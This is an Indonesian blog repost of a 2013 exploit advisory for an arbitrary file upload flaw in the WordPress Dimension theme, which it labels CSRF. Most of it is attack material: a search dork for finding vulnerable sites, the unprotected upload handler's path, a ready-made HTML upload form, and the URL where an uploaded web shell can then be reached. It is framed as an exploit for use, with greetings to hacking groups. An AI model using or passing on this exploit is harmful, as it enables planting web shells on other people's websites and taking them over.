a-ads

Kamis, 30 Maret 2017

Unknown

WordPress Theme Dimension - Cross-Site Request Forgery

    Tidak ada komentar:


#Title : Wordpress Dimension Themes CSRF File Upload Vulnerability
 
#Author : DevilScreaM
 
#Date : 11/17/2013 - 17 November 2013
 
#Category : Web Applications
 
#Type : PHP
 
#Vendor : http://themeforest.net
 
#Download : http://themeforest.net/item/dimension-retina-responsive-multipurpose-theme/
 
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
     Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
 
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
 
#Tested : Mozila, Chrome, Opera -> Windows & Linux
 
#Vulnerabillity : CSRF
 
#Dork :
 
inurl:wp-content/themes/dimension
 
 
CSRF File Upload Vulnerability
 
Exploit & POC :
 
http://site-target/wp-content/themes/dimension/library/includes/upload-handler.php
 
Script :
 
<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
 
 
File Access :
 
http://site-target/uploads/[years]/[month]/your_shell.php
 
Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

Unknown

About Unknown -

Author Description here.. Nulla sagittis convallis. Curabitur consequat. Quisque metus enim, venenatis fermentum, mollis in, porta et, nibh. Duis vulputate elit in elit. Mauris dictum libero id justo.

Subscribe to this Blog via Email :

© Copyright 2015 Indonesian 1337. Designed by Bloggertheme9 | Distributed By Gooyaabi Templates. Powered by Blogger.